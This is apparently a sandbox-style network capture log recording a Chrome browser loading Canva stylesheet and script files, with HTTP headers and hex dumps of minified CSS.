                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:37 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/css
                                                                                                                                                                                                                                                                    Content-Length: 3697
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e5950fe7bc243f3-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 568096
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "51084c4d3b19b1a2c892c18724a93404"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:23 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Thu, 14 Nov 2024 00:49:00 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Sat, 15 Nov 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: QeEaTjcrk04M9xWDMtEJwEy+71iw1j/s9fKwV9KC7PnaQnXu0TX+tjwgkb8HP9JmF2SfwmusU2s=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: VN0YDK0RRV3NH6H5
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: GxcG2.uHqqky7LFNShFWAmapXSwleJJO
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:37 UTC348INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 79 69 46 4e 70 73 61 45 77 25 32 42 35 79 39 56 74 72 47 5a 42 57 30 32 58 37 6e 6c 75 4a 70 43 76 30 7a 34 64 69 4e 64 6f 36 64 34 4b 71 55 65 77 4a 43 4e 7a 34 38 38 62 6b 68 78 44 6c 73 57 31 30 4d 42 37 35 32 7a 56 61 68 75 44 54 69 72 42 73 41 6b 56 73 55 39 6b 37 56 69 75 31 33 31 63 62 4b 25 32 42 45 62 32 62 41 6e 31 77 65 6c 53 61 44 6f 50 68 4b 55 4a 30 66 62 6d 4a 32 79 79 4a 6f 52 72 59 73 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yiFNpsaEw%2B5y9VtrGZBW02X7nluJpCv0z4diNdo6d4KqUewJCNz488bkhxDlsW10MB752zVahuDTirBsAkVsU9k7Viu131cbK%2BEb2bAn1welSaDoPhKUJ0fbmJ2yyJoRrYs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    2024-11-20 15:01:37 UTC1207INData Raw: 2e 6c 69 67 68 74 7b 2d 2d 56 73 46 52 46 67 3a 72 67 62 61 28 36 34 2c 38 37 2c 31 30 39 2c 2e 30 34 29 7d 2e 64 61 72 6b 7b 2d 2d 56 73 46 52 46 67 3a 23 33 62 33 63 33 64 7d 2e 68 4b 72 6a 35 77 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2d 31 70 78 7d 2e 46 58 61 68 57 41 7b 66 69 6c 6c 3a 72 67 62 61 28 36 34 2c 38 37 2c 31 30 39 2c 2e 30 37 29 7d 2e 47 6e 70 61 69 51 7b 66 69 6c 6c 3a 76 61 72 28 2d 2d 34 52 61 53 6a 67 29 7d 2e 6c 37 64 6f 4d 77 7b 66 69 6c 6c 3a 76 61 72 28 2d 2d 56 73 46 52 46 67 29 7d 2e 68 5a 38 62 54 77 7b 2d 2d 4c 41 6c 72 63 41 3a 61 75 74 6f 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 76 61 72 28 2d 2d 34 52 61 53 6a 67 29 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 32 70 78 3b 62 6f
                                                                                                                                                                                                                                                                    Data Ascii: .light{--VsFRFg:rgba(64,87,109,.04)}.dark{--VsFRFg:#3b3c3d}.hKrj5w{display:block;margin-bottom:-1px}.FXahWA{fill:rgba(64,87,109,.07)}.GnpaiQ{fill:var(--4RaSjg)}.l7doMw{fill:var(--VsFRFg)}.hZ8bTw{--LAlrcA:auto;background:var(--4RaSjg);border-radius:12px;bo
                                                                                                                                                                                                                                                                    2024-11-20 15:01:37 UTC1369INData Raw: 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 56 4e 58 70 53 77 29 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 67 72 6f 77 3a 31 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 2e 4c 47 4b 30 41 77 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 2e 5f 31 45 77 62 47 51 7b 74 72 61 6e 73 69 74 69 6f 6e 3a 74 72 61 6e 73 66 6f 72 6d 20 2e 32 35 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2c 30 2c 2e 32 2c 31 29 7d 2e 51 53 4b 52 4b 41 7b 74 72 61 6e 73 69 74 69 6f 6e 3a 74 72 61 6e 73 66 6f 72 6d 20 2e 32 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 34 2c 30 2c 31 2c 31 29 7d 2e 44 53 31 65 63 51 2e 43 5f 6f 42 54 67 7b 62 6f 72 64 65 72 2d 72 61 64 69
                                                                                                                                                                                                                                                                    Data Ascii: izing:border-box;color:var(--VNXpSw);display:flex;flex-grow:1;height:100%;overflow:hidden}.LGK0Aw{overflow:visible}._1EwbGQ{transition:transform .25s cubic-bezier(0,0,.2,1)}.QSKRKA{transition:transform .2s cubic-bezier(.4,0,1,1)}.DS1ecQ.C_oBTg{border-radi
                                                                                                                                                                                                                                                                    2024-11-20 15:01:37 UTC1121INData Raw: 77 35 41 2c 2e 64 37 6d 6c 44 77 3e 2e 62 38 33 77 35 41 7b 62 6f 74 74 6f 6d 3a 30 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 74 6f 70 3a 30 7d 2e 44 53 31 65 63 51 3e 2e 62 38 33 77 35 41 2c 2e 64 6a 51 45 31 51 3e 2e 62 38 33 77 35 41 7b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 6c 65 66 74 3a 30 3b 72 69 67 68 74 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 46 72 64 48 4c 41 7b 6f 70 61 63 69 74 79 3a 30 3b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 6e 6f 6e 65 7d 2e 63 31 4a 64 36 51 7b 6f 70 61 63 69 74 79 3a 31 7d 2e 7a 37 4d 58 73 51 7b 68 65 69 67 68 74 3a 31 30 30 25 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 45 5f 43 4c 4f 77 7b 2d 77 65 62 6b 69 74 2d 6f 76 65 72 66 6c
                                                                                                                                                                                                                                                                    Data Ascii: w5A,.d7mlDw>.b83w5A{bottom:0;flex-direction:row;height:100%;top:0}.DS1ecQ>.b83w5A,.djQE1Q>.b83w5A{flex-direction:column;left:0;right:0;width:100%}.FrdHLA{opacity:0;pointer-events:none}.c1Jd6Q{opacity:1}.z7MXsQ{height:100%;width:100%}.E_CLOw{-webkit-overfl


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    40192.168.2.1249763104.16.103.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:37 UTC806OUTGET /web/1790b19a3beefdca.ltr.css HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:37 UTC1184INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:37 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/css
                                                                                                                                                                                                                                                                    Content-Length: 16107
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e5950fefe8b4408-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 136342
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "717f7297528b5128054ef0e2c9ace69d"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:23 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Tue, 19 Nov 2024 01:00:17 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Thu, 20 Nov 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: JOT8Neug8cYZRtJUQj74sz7vwm7bsGVRamD7+nbR7jghm3Z0ER2195DT3cCYcNUlDIMJ8B8xXhs=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: 1PFDD5XCPD9DMP2X
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: K2rlgHFdIkeh.utRJYQYfs_bogWk2Mg0
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:37 UTC352INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 61 72 54 65 32 53 45 36 70 6b 78 71 4a 58 25 32 42 61 6d 74 70 58 66 41 58 34 73 53 57 35 58 4b 77 50 49 46 44 67 68 33 36 38 39 75 32 65 4a 42 4b 43 48 59 4a 36 31 38 6b 61 72 52 79 34 55 49 4d 59 76 4c 6c 61 25 32 46 53 61 77 58 4d 4c 4f 37 67 6f 39 4d 48 4e 52 5a 65 66 4f 7a 25 32 46 77 4b 76 43 59 37 6b 65 6b 25 32 46 4e 37 76 73 63 31 4c 62 49 48 63 41 35 36 4c 5a 36 4e 4a 59 53 66 78 54 4c 75 41 7a 78 61 6b 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=arTe2SE6pkxqJX%2BamtpXfAX4sSW5XKwPIFDgh3689u2eJBKCHYJ618karRy4UIMYvLla%2FSawXMLO7go9MHNRZefOz%2FwKvCY7kek%2FN7vsc1LbIHcA56LZ6NJYSfxTLuAzxak%3D"}],"group":"cf-nel","max_age":6048
                                                                                                                                                                                                                                                                    2024-11-20 15:01:37 UTC1202INData Raw: 2e 72 5a 79 53 69 77 7b 2d 77 65 62 6b 69 74 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 7d 2e 6c 30 58 4d 48 51 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 34 70 78 20 30 7d 2e 57 45 4a 65 54 77 7b 63 75 72 73 6f 72 3a 6e 6f 74 2d 61 6c 6c 6f 77 65 64 7d 2e 55 75 66 41 78 77 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 3b 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 3a 30 3b 6f 70 61 63 69 74 79 3a 30 3b 77 69 64 74 68 3a 30 7d 2e 45 6d 70 37 55 77 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65 78 2d 73 74 61 72 74 7d 2e 45 6d 70 37 55
                                                                                                                                                                                                                                                                    Data Ascii: .rZySiw{-webkit-tap-highlight-color:transparent;cursor:pointer;display:flex}.l0XMHQ{align-items:center;padding:4px 0}.WEJeTw{cursor:not-allowed}.UufAxw{-webkit-appearance:none;appearance:none;margin:0;opacity:0;width:0}.Emp7Uw{align-self:flex-start}.Emp7U
                                                                                                                                                                                                                                                                    2024-11-20 15:01:37 UTC1369INData Raw: 55 75 66 41 78 77 3a 6e 6f 74 28 3a 61 63 74 69 76 65 29 2b 2e 51 35 6a 5f 70 67 3a 6e 6f 74 28 2e 5f 31 47 72 37 6f 51 2c 2e 42 5a 55 4d 67 67 29 3e 2e 41 7a 4c 78 54 41 2c 2e 72 5a 79 53 69 77 2e 68 62 65 59 78 41 3a 6e 6f 74 28 2e 57 45 4a 65 54 77 29 3a 68 6f 76 65 72 20 2e 55 75 66 41 78 77 3a 6e 6f 74 28 3a 61 63 74 69 76 65 29 2b 2e 51 35 6a 5f 70 67 3a 6e 6f 74 28 2e 5f 31 47 72 37 6f 51 2c 2e 42 5a 55 4d 67 67 29 3e 2e 44 50 56 47 45 51 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 6e 77 4e 73 38 77 29 3b 6f 70 61 63 69 74 79 3a 31 7d 2e 72 5a 79 53 69 77 2e 68 62 65 59 78 41 3a 6e 6f 74 28 2e 57 45 4a 65 54 77 29 3a 68 6f 76 65 72 20 2e 55 75 66 41 78 77 3a 6e 6f 74 28 3a 61 63 74 69 76 65 29 2b 2e 51 35 6a 5f 70 67 2e 5f 38 4c 43 49 6a 67 2e 42 5a 55
                                                                                                                                                                                                                                                                    Data Ascii: UufAxw:not(:active)+.Q5j_pg:not(._1Gr7oQ,.BZUMgg)>.AzLxTA,.rZySiw.hbeYxA:not(.WEJeTw):hover .UufAxw:not(:active)+.Q5j_pg:not(._1Gr7oQ,.BZUMgg)>.DPVGEQ{color:var(--nwNs8w);opacity:1}.rZySiw.hbeYxA:not(.WEJeTw):hover .UufAxw:not(:active)+.Q5j_pg._8LCIjg.BZU
                                                                                                                                                                                                                                                                    2024-11-20 15:01:37 UTC1369INData Raw: 2e 42 5a 55 4d 67 67 2c 2e 72 5a 79 53 69 77 3a 6e 6f 74 28 2e 57 45 4a 65 54 77 29 20 2e 55 75 66 41 78 77 3a 61 63 74 69 76 65 2b 2e 51 35 6a 5f 70 67 2e 5f 31 47 72 37 6f 51 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 30 20 30 20 31 36 70 78 2c 30 20 30 20 30 20 34 70 78 20 76 61 72 28 2d 2d 33 52 34 75 38 77 29 7d 2e 72 5a 79 53 69 77 3a 6e 6f 74 28 2e 57 45 4a 65 54 77 29 20 2e 55 75 66 41 78 77 3a 61 63 74 69 76 65 2b 2e 51 35 6a 5f 70 67 2e 42 5a 55 4d 67 67 3e 2e 41 7a 4c 78 54 41 2c 2e 72 5a 79 53 69 77 3a 6e 6f 74 28 2e 57 45 4a 65 54 77 29 20 2e 55 75 66 41 78 77 3a 61 63 74 69 76 65 2b 2e 51 35 6a 5f 70 67 2e 42 5a 55 4d 67 67 3e 2e 44 50 56 47 45 51 2c 2e 72 5a 79 53 69 77 3a 6e 6f 74 28 2e 57 45 4a 65 54 77 29 20 2e 55 75 66
                                                                                                                                                                                                                                                                    Data Ascii: .BZUMgg,.rZySiw:not(.WEJeTw) .UufAxw:active+.Q5j_pg._1Gr7oQ{box-shadow:inset 0 0 0 16px,0 0 0 4px var(--3R4u8w)}.rZySiw:not(.WEJeTw) .UufAxw:active+.Q5j_pg.BZUMgg>.AzLxTA,.rZySiw:not(.WEJeTw) .UufAxw:active+.Q5j_pg.BZUMgg>.DPVGEQ,.rZySiw:not(.WEJeTw) .Uuf
                                                                                                                                                                                                                                                                    2024-11-20 15:01:37 UTC1369INData Raw: 2e 78 54 68 5a 4b 67 29 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 73 5f 4a 47 63 67 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 3b 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 69 6e 68 65 72 69 74 3b 62 6f 72 64 65 72 3a 30 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 76 61 72 69 61 6e 74 2d 6c 69 67 61 74 75 72 65 73 3a 6e 6f 6e 65 3b 6d 69 6e 2d 77 69 64 74 68 3a 38 70 78 3b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 65 6f 58 64 4f 67 7b 70 61 64 64 69 6e
                                                                                                                                                                                                                                                                    Data Ascii: .xThZKg){background-color:transparent;border-color:transparent}.s_JGcg{-webkit-appearance:none;appearance:none;background:inherit;border:0;box-sizing:border-box;color:inherit;font-variant-ligatures:none;min-width:8px;outline:none;width:100%}.eoXdOg{paddin
                                                                                                                                                                                                                                                                    2024-11-20 15:01:37 UTC1369INData Raw: 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 36 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 64 66 76 33 43 77 2e 64 66 76 33 43 77 7b 70 61 64 64 69 6e 67 3a 30 20 36 70 78 7d 2e 70 32 33 36 49 51 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 68 65 69 67 68 74 3a 32 30 70 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 32 30 70 78 7d 2e 70 32 33 36 49 51 2e 70 32 33 36 49 51 7b 70 61 64 64 69 6e 67 3a 30 20 33 70 78 7d
                                                                                                                                                                                                                                                                    Data Ascii: px;line-height:16px;position:relative;vertical-align:middle;white-space:nowrap}.dfv3Cw.dfv3Cw{padding:0 6px}.p236IQ{border-radius:9999px;box-sizing:border-box;height:20px;justify-content:center;line-height:20px;min-width:20px}.p236IQ.p236IQ{padding:0 3px}
                                                                                                                                                                                                                                                                    2024-11-20 15:01:37 UTC1369INData Raw: 76 61 72 28 2d 2d 33 59 4f 46 4f 77 29 7d 2e 71 49 79 74 58 77 7b 63 75 72 73 6f 72 3a 6e 6f 74 2d 61 6c 6c 6f 77 65 64 7d 2e 4d 54 44 72 59 51 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 30 20 31 70 78 20 23 66 66 66 7d 2e 73 5f 47 39 6d 41 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 73 5f 47 39 6d 41 20 2e 5f 33 37 59 45 53 77 2c 2e 73 5f 47 39 6d 41 20 2e 64 66 76 33 43 77 7b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 6e 6f 6e 65 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a 30 3b 74 6f 70 3a 30 7d 2e 73 5f 47 39 6d 41 20 2e 5f 35 33 54 56 70 67 7b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 74 6f 70 20 72 69 67 68 74 7d 2e 4c 4c 7a 38
                                                                                                                                                                                                                                                                    Data Ascii: var(--3YOFOw)}.qIytXw{cursor:not-allowed}.MTDrYQ{box-shadow:0 0 0 1px #fff}.s_G9mA{display:inline-flex;position:relative}.s_G9mA ._37YESw,.s_G9mA .dfv3Cw{pointer-events:none;position:absolute;right:0;top:0}.s_G9mA ._53TVpg{transform-origin:top right}.LLz8
                                                                                                                                                                                                                                                                    2024-11-20 15:01:37 UTC1369INData Raw: 70 70 6f 72 74 73 20 28 28 2d 77 65 62 6b 69 74 2d 6d 61 73 6b 3a 6e 6f 6e 65 29 20 6f 72 20 28 6d 61 73 6b 3a 6e 6f 6e 65 29 29 7b 2e 5f 33 37 59 45 53 77 3a 61 66 74 65 72 7b 6f 75 74 6c 69 6e 65 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 64 68 39 63 58 67 7b 6d 61 72 67 69 6e 3a 2d 34 70 78 3b 2d 77 65 62 6b 69 74 2d 6d 61 73 6b 3a 72 61 64 69 61 6c 2d 67 72 61 64 69 65 6e 74 28 63 69 72 63 6c 65 20 61 74 20 63 61 6c 63 28 31 30 30 25 20 2d 20 35 70 78 20 2d 20 76 61 72 28 2d 2d 30 63 73 4e 49 67 2c 20 30 70 78 29 29 20 63 61 6c 63 28 35 70 78 20 2b 20 76 61 72 28 2d 2d 72 48 37 4e 52 67 2c 20 30 70 78 29 29 2c 74 72 61 6e 73 70 61 72 65 6e 74 20 36 70 78 2c 23 66 66 66 20 36 2e 37 35 70 78 29 3b 6d 61 73 6b 3a 72 61 64 69 61 6c 2d 67
                                                                                                                                                                                                                                                                    Data Ascii: pports ((-webkit-mask:none) or (mask:none)){._37YESw:after{outline-color:transparent}.dh9cXg{margin:-4px;-webkit-mask:radial-gradient(circle at calc(100% - 5px - var(--0csNIg, 0px)) calc(5px + var(--rH7NRg, 0px)),transparent 6px,#fff 6.75px);mask:radial-g
                                                                                                                                                                                                                                                                    2024-11-20 15:01:37 UTC1369INData Raw: 61 35 67 61 7a 67 2e 45 36 4b 50 64 41 3a 62 65 66 6f 72 65 2c 2e 5f 33 37 59 45 53 77 2e 61 35 67 61 7a 67 2e 78 35 47 43 76 41 3a 62 65 66 6f 72 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 6e 77 4e 73 38 77 29 7d 2e 5f 33 37 59 45 53 77 2e 61 35 67 61 7a 67 2e 56 38 44 37 68 77 3a 62 65 66 6f 72 65 2c 2e 5f 33 37 59 45 53 77 2e 61 35 67 61 7a 67 2e 72 53 6a 64 6a 41 3a 62 65 66 6f 72 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 33 4b 51 6a 36 41 29 7d 2e 5f 33 37 59 45 53 77 2e 61 35 67 61 7a 67 2e 4a 36 38 43 75 41 3a 62 65 66 6f 72 65 2c 2e 5f 33 37 59 45 53 77 2e 61 35 67 61 7a 67 2e 55 7a 49 4f 49 51 3a 62 65 66 6f 72 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d
                                                                                                                                                                                                                                                                    Data Ascii: a5gazg.E6KPdA:before,._37YESw.a5gazg.x5GCvA:before{background-color:var(--nwNs8w)}._37YESw.a5gazg.V8D7hw:before,._37YESw.a5gazg.rSjdjA:before{background-color:var(--3KQj6A)}._37YESw.a5gazg.J68CuA:before,._37YESw.a5gazg.UzIOIQ:before{background-color:var(-
                                                                                                                                                                                                                                                                    2024-11-20 15:01:37 UTC1369INData Raw: 28 25 32 33 61 29 27 20 64 3d 27 4d 30 20 30 68 33 32 76 33 32 48 30 7a 27 2f 25 33 45 25 33 43 2f 73 76 67 25 33 45 22 29 7d 5b 64 69 72 3d 72 74 6c 5d 20 2e 5f 36 77 69 54 6e 67 2e 5f 76 42 50 49 51 20 2e 6a 64 46 5a 44 77 20 73 76 67 7b 2d 77 65 62 6b 69 74 2d 6d 61 73 6b 2d 69 6d 61 67 65 3a 75 72 6c 28 22 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 2c 25 33 43 73 76 67 20 77 69 64 74 68 3d 27 33 32 27 20 68 65 69 67 68 74 3d 27 33 32 27 20 78 6d 6c 6e 73 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 27 25 33 45 25 33 43 64 65 66 73 25 33 45 25 33 43 6d 61 73 6b 20 69 64 3d 27 61 27 25 33 45 25 33 43 70 61 74 68 20 66 69 6c 6c 3d 27 25 32 33 66 66 66 27 20 64 3d
                                                                                                                                                                                                                                                                    Data Ascii: (%23a)' d='M0 0h32v32H0z'/%3E%3C/svg%3E")}[dir=rtl] ._6wiTng._vBPIQ .jdFZDw svg{-webkit-mask-image:url("data:image/svg+xml;charset=utf-8,%3Csvg width='32' height='32' xmlns='http://www.w3.org/2000/svg'%3E%3Cdefs%3E%3Cmask id='a'%3E%3Cpath fill='%23fff' d=


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    41192.168.2.1249765104.16.103.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:37 UTC787OUTGET /web/f2b916a20536621e.js HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
